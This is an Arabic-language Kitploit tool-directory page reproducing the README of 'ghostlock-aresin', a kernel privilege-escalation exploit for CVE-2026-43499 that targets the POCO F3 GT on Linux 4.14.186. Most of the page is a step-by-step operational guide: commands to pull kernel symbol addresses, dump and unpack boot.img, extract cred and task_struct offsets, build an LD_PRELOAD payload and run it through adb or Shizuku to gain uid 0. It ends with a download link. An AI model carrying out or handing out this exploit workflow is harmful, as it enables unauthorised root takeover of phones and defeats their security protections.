Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ghostlock-aresin — استغلال GhostLock (CVE-2026-43499) لجهاز POCO F3 GT (aresin) — تصعيد صلاحيات نواة Linux 4.14.186 بمعمارية ARM64 من MediaTek Dimensity 1200 عبر التلاعب بسلسلة futex PI | Kitploit
أدوات/GitHubGitHub/nothingfumo/ghostlock-aresin
أمان أندرويدتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالهندسة العكسيةأمن الجوالاستغلال الملفات الثنائية
GitHubnothingfumo/ghostlock-aresin

ghostlock-aresin

استغلال GhostLock (CVE-2026-43499) لجهاز POCO F3 GT (aresin) — تصعيد صلاحيات نواة Linux 4.14.186 بمعمارية ARM64 من MediaTek Dimensity 1200 عبر التلاعب بسلسلة futex PI

عرض المستودع
429منذ 25 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

GhostLock (CVE-2026-43499) — POCO F3 GT (aresin)

استغلال كتابة فوقية لـ physmap يعتمد على البيانات فقط لمعالج MediaTek Dimensity 1200 (MT6893). النواة: 4.14.186-android13 / MIUI V14.0.4.0.TKJCNXM.

⚠️ المتطلبات الأساسية

  • الجهاز: POCO F3 GT / Redmi K40 Gaming Edition (الاسم الرمزي: aresin)
  • الشريحة: MediaTek Dimensity 1200 (MT6893)
  • النظام: Android 13 / MIUI 14 (V14.0.4.0.TKJCNXM)
  • النواة: 4.14.186-g0dc1d312efb3
  • لا حاجة لفك قفل الـ BL — يمكن الحصول على صلاحيات shell للتشغيل عبر Shizuku (تصحيح الأخطاء اللاسلكي)
  • Shizuku أو adb shell يمكنها تنفيذ ثنائي arm64
  • بعد التشغيل سيُعاد تشغيل الجهاز (kernel panic — سلوك متوقع). لحفظ السجلات، وصّل adb logcat مسبقًا

✅ فحص شروط الثغرة

الشرطالحالةالوصف
نطاق إصدار النواة✅4.14.186 يقع ضمن نطاق 2.6.39 ~ 7.0.4
CONFIG_FUTEX_PI✅مفعّل (y)
CONFIG_RT_MUTEXES✅مفعّل (y)
البنية✅aarch64
CONFIG_PREEMPT✅مفعّل (y)
CONFIG_RANDOMIZE_KSTACK❓يتطلب التأكيد (قد لا يكون مدعومًا في 4.14)

🔧 خطوات التكييف

الخطوة الأولى: استخراج عناوين رموز النواة

root@kitploit:~
# 在设备上运行提取脚本
adb push tools/extract_offsets.sh /data/local/tmp/
adb shell sh /data/local/tmp/extract_offsets.sh
adb pull /data/local/tmp/ghostlock_offsets.txt

إذا كان لديك صلاحية root (Magisk)، يمكن الاستخراج مباشرة من /proc/kallsyms:

root@kitploit:~
adb shell su -c "cat /proc/kallsyms | grep -E 'init_task|init_cred|entry_task|__per_cpu_offset|root_task_group|selinux_enforcing'"

الخطوة الثانية: استخراج vmlinux وتحليل إزاحات البنى

الطريقة A: استخراج vmlinux من boot.img

root@kitploit:~
# 1. 获取 boot.img
adb shell "ls /dev/block/by-name/boot"
adb shell "dd if=/dev/block/by-name/boot of=/data/local/tmp/boot.img"
adb pull /data/local/tmp/boot.img

# 2. 用 magiskboot 解包
magiskboot unpack boot.img
# 产物: kernel (压缩的 vmlinux)

# 3. 解压 vmlinux
magiskboot decompress kernel vmlinux.elf

# 4. 用 pahole 提取结构体偏移
pahole --structs=rt_mutex_waiter vmlinux.elf
pahole --structs=task_struct vmlinux.elf | grep -A2 -E "usage|prio|normal_prio|pi_lock|pi_waiters|pi_top_task|pi_blocked_on|cred|real_cred|task_group"

الطريقة B: التحليل باستخدام Ghidra

  1. افتح vmlinux.elf باستخدام Ghidra
  2. ابحث عن البني rt_mutex_waiter وtask_struct
  3. سجّل إزاحات كل حقل

الخطوة الثالثة: تعبئة target.h

املأ جميع مواضع 0xTODO في target.h بالإزاحات المستخرجة.

جدول الإزاحات الرئيسية:

الخطوة الرابعة: البناء

root@kitploit:~
# 需要 Android NDK r27+
export NDK_ROOT=/path/to/android-ndk-r27
# 或使用 Android Studio 中的 NDK
export NDK_ROOT=$HOME/Library/Android/sdk/ndk/27.0.12077973

# 编译
make preload TARGET_HEADER=target.h

# 产物: build/bin/preload.so

الخطوة الخامسة: الاختبار

root@kitploit:~
# 推送到设备
adb push build/bin/preload.so /data/local/tmp/
adb push build/bin/ghostlock_aresin /data/local/tmp/ 2>/dev/null || true

# 运行
adb shell LD_PRELOAD=/data/local/tmp/preload.so /data/local/tmp/ghostlock_aresin

# 或用 Shizuku
# 在 Shizuku 中执行: LD_PRELOAD=/data/local/tmp/preload.so /data/local/tmp/ghostlock_aresin

📊 السلوك المتوقع

⚠️ ملاحظات مهمة

الفروقات بين النواة 4.14.x و6.1.x

  1. بنية rt_mutex_waiter مختلفة:

    • 4.14.x تستخدم plist_node بدلاً من rb_node
    • إزاحات الحقول مختلفة تمامًا
    • قد لا توجد حقول deadline / ww_ctx
  2. تخطيط task_struct مختلف:

    • إزاحات pi_blocked_on وpi_lock وغيرها في 4.14.x تختلف عن 6.1.x
    • الحقول المتعلقة بـ uclamp قد لا تكون موجودة في 4.14.x
  3. تطبيق KASLR مختلف:

    • طريقة العشوائية KASLR في 4.14.x تختلف عن 6.1.x
    • قد تحتاج طريقة التسريب إلى تعديل
  4. الفروقات الأمنية بين Android 13 و14:

    • سياسة SELinux قد تكون مختلفة
    • قيود الوصول إلى /proc/self/pagemap قد تكون مختلفة

التحقق من الإزاحات

بعد تعبئة الإزاحات، يُنصح بالتحقق المتقاطع باستخدام Ghidra:

  1. افتح vmlinux.elf في Ghidra
  2. انتقل إلى البنية rt_mutex_waiter
  3. تأكد من أن إزاحة كل حقل مطابقة لما في target.h

📁 هيكل الملفات

root@kitploit:~
ghostlock-aresin/
├── README.md              # 本文件
├── Makefile               # 编译脚本
├── target.h               # 目标设备偏移定义 (需要填写)
├── src/                   # 源码
│   ├── main.c             # 主利用逻辑
│   ├── util.c             # 工具函数
│   ├── slide.c            # KASLR 泄漏
│   ├── fops.c             # 文件操作
│   ├── pipe.c             # pipe 相关
│   ├── preload.c          # LD_PRELOAD 入口
│   ├── su_daemon.c        # su 守护进程
│   ├── su_blob.S          # su 二进制嵌入
│   ├── standalone.c       # 独立运行
│   ├── common.h           # 公共定义
│   └── offset.h           # 偏移计算
├── tools/
│   └── extract_offsets.sh # 偏移提取脚本
└── build/
    ├── bin/               # 编译产物
    └── embed/             # 嵌入文件

📜 الترخيص

لأغراض البحث والتعليم فقط. استخدمه على مسؤوليتك الخاصة.

الـ PoC الأصلي: NebuSec/CyberMeowfia → IonStack/CVE-2026-43499/exploit/ مكيَّف لـ: POCO F3 GT (aresin) بواسطة ghostlock-aresin

تنزيل الأداة
الحقلالوصفطريقة الاستخراج
INIT_TASKعنوان init_task/proc/kallsyms أو Ghidra
INIT_CREDعنوان init_cred/proc/kallsyms أو Ghidra
WAITER_*_OFFإزاحات حقول rt_mutex_waiterpahole / Ghidra
FAKE_TASK_*_OFFإزاحات حقول task_structpahole / Ghidra
TASK_CRED_OFFإزاحة مؤشر credpahole / Ghidra
المرحلةالمخرجاتالوصف
التهيئة[*] GhostLock - aresin (MT6893 D1200) 4.14.186تم التعرف على الجهاز بشكل صحيح
ربط CPU[+] CPU0 pinnedتثبيت على CPU0
تحميل العناوين[*] init_task @ 0xffffffc00xxxxxxxعنوان LM ثابت
فحص الصلاحيات[+] uid: xxxxxطباعة uid الحالي
انزياح KASLR[+] slide = 0 أو slide = xxxكشف KASLR
تشغيل رفع الصلاحياتبعد النجاح يصبح uid 0الحصول على root
الفشل[-] ... + إعادة تشغيلkernel panic (الثغرة موجودة لكن الإزاحات تحتاج تعديل)